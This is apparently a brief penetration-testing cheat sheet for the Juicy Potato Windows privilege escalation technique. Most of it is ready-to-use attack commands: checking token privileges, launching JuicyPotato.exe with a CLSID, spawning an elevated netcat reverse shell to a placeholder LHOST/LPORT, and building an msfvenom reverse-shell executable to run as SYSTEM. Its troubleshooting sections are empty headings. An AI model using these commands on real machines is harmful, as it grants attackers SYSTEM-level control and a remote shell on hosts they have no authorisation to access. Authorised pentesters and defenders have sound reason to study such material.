Juicy Potato
Check privileges
whoami /privExploiting
JuicyPotato.exe -l 9999 -p <process> -a "<arguments>" -t * -c '<CLID>'Elevated reverse shell
JuicyPotato.exe -l 6666 -p <path to nc.exe> -a "-nv <LHOST> <LPORT> -e cmd.exe" -t *Local payload
msfvenom -p windows/<arch>/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell.exe
JuicyPotato.exe -l 6666 -p c:\Windows\System32\cmd.exe -t * -a "/c c:\<path to shell.exe>"List of CLIDS
Troubleshooting
CreateProcess error codes:
Code
Meaning
Comment
recv failure:
Code
Meaning
Comment
Last updated